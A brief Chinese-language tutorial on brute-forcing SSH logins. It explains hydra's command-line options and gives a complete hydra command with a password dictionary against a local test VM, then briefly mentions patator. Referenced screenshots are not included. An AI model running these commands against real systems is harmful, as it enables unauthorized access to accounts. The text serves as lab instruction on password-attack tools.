ssh暴力破解

一、使用hydra进行

1、常用参数介绍

-l 登录名 如：-l root

-L 读取登录文件名 如：-L D:\login.txt

-p 密码 如：-p 123456

-P 读取密码文件名，如 -P D:\passwords.txt

-C 冒号分隔“登录：通行证”格式

-M  要攻击的服务器列表，每行一个条目，“：”指定端口

-t   并行运行任务数（每个主机，默认值：16），如 -t 10

2、测试环境为本地搭建的一台虚拟机，IP192.168.47.128

测试语句如下

hydra -l root -P D:\passwords.txt -t 1 -vV -e ns 192.168.47.128 ssh

因为是测试，字典中只有1-9和正确密码，运行结果如下

得出一有效密码。

二、使用patator

大体原理类似，只是patator的话只是返回了尝试的结果，需要自己从结果中判断。

当看到返回正常ssh信息时,操作见下图